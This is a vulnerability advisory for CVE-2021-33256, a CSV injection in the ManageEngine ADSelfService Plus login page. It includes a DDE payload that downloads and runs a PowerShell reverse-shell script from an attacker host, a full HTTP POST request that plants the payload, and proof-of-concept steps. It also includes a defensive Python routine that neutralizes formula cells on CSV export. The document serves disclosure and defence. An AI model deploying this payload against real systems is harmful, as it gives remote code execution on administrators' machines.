# ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)

### Description

The login panel of ManageEngine ADSelfService has a CSV injection vulnerability that can be exploited by an unauthenticated user. The `j_username` parameter seems to be vulnerable, and a reverse shell could be obtained if a privileged user exports the *"User Attempts Audit Report"* as a CSV file.

{% code title="Payload:" %}

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0
```

{% endcode %}

### Proof Of Concept

**1-** A malicious user sends a POST request to the login page `https://TARGET-IP/j_security_check` and sets the `j_username` parameter to the payload above.

{% code title="j\_username parameter:" %}

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'
```

{% endcode %}

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_Hd0abEiow7_xBNPlA%2F-M_Hd80_mGdnuCpsXmEz%2Fadcsv1.PNG?alt=media\&token=09f05596-9275-4257-9473-3505b547d919)

{% code title="POST Request:" %}

```
POST /j_security_check HTTP/1.1
Host: 192.168.1.253:9251
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: https://192.168.1.253:9251
Connection: close
Referer: https://192.168.1.253:9251/j_security_check
Cookie: *
Upgrade-Insecure-Requests: 1

j_username=%3Dcmd%7C%27%2FC+powershell.exe+-c+iex+%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.1.111%2FInvoke-PowerShellTcp.ps1%27%29%27&j_password=admin&domainName=kandemir.local&AUTHRULE_NAME=ADAuthenticator&adscsrf=741024de-45e4-4193-b0a3-d1fd2d663f28
```

{% endcode %}

The login attempt is then saved to the *"User Attempts Audit Report"* table under the *Reports > Audit Reports* section. URL: `https://TARGET-IP/webclient/index.html#/reports/listReports/12`

The `j_username` parameter value is saved to the *"User Name"* column, which is the start of the line in the CSV file:

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://192.168.1.111/Invoke-PowerShellTcp.ps1')'
```

**2-** The PowerShell command that sends the reverse shell to the attacker's machine is embedded in the last line of the `Invoke-PowerShellTcp.ps1` file.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_HdIeNWsIIibr0WKmo%2F-M_Hdm82W7S5j24idP85%2Fadcsv7.PNG?alt=media\&token=59394ca6-3f62-44c9-91a7-a63e30373c43)

**3-** If an admin user exports this table as a CSV file and confirms the alert popup, the malicious user obtains a reverse shell connection.

![Exporting User Attempts Audit Report as CSV file](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_HdIeNWsIIibr0WKmo%2F-M_Hdfk8dtkLXiSQ1xX1%2Fadcsv2.PNG?alt=media\&token=0566d768-8c91-4f6a-9fd4-c4188da4a0c6)

![Confirmation for Starting Another Application](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_HgnV2C760HOVCySZU%2F-M_HgxXQHVXrioNdm5A8%2Fadcsv3.PNG?alt=media\&token=8d2e91b0-521b-4181-b569-595b3bc68f7b)

![Exported CSV file](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_Hh5sgBRpc2pG2gD89%2F-M_Hh9213DUVogbg2RiQ%2Fadcsv5.PNG?alt=media\&token=a07f17f1-c171-452b-b884-4a18a731e00e)

![Getting Reverse Shell](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_Hh5sgBRpc2pG2gD89%2F-M_HhDy80hcV0m5F5YfM%2Fadcsv6.PNG?alt=media\&token=a7c98c8c-3169-42a2-9210-ff60e74cfb9c)
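An export-side mitigation for the flow above, added here as an example and not taken from the original advisory or from ManageEngine's code: it neutralizes cells that a spreadsheet would evaluate as a formula before an audit report is written to CSV, following the OWASP CSV Injection guidance listed under Reference. The function names, the column names other than "User Name", and the sample rows are assumptions constructed for illustration.

```python
import csv
import io

# Leading characters that spreadsheet applications treat as the start of a
# formula or DDE expression (per the OWASP CSV Injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if the cell starts with a formula trigger character."""
    # Conservative choice: also catch a trigger hidden behind leading spaces.
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Prefix formula-like cells with a single quote so they are read as text."""
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text


def export_audit_rows(header, rows) -> str:
    """Write rows to CSV with every field quoted and formula cells neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def flag_suspicious_usernames(rows, column=0):
    """Return stored user names that look like formulas, for alerting or review."""
    return [row[column] for row in rows if is_formula_like(str(row[column]))]


# Constructed sample rows shaped like a "User Attempts Audit Report".
HEADER = ["User Name", "Domain", "Status"]
SAMPLE_ROWS = [
    ["jsmith", "example.local", "Success"],
    ["=cmd|'/C <command>'!A0", "example.local", "Invalid login"],  # placeholder
    ["-2+3", "example.local", "Invalid login"],
]

if __name__ == "__main__":
    print(export_audit_rows(HEADER, SAMPLE_ROWS))
```

The quote prefix also alters legitimate values that begin with `-` or `+`, so apply it to free-text columns such as user names rather than to numeric ones.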

{% embed url="<https://nvd.nist.gov/vuln/detail/CVE-2021-33256>" %}

{% embed url="<https://www.exploit-db.com/exploits/49885>" %}

```
# Author: Metin Yunus Kandemir
```

### Reference

{% embed url="<https://owasp.org/www-community/attacks/CSV_Injection>" %}

{% embed url="<https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1>" %}
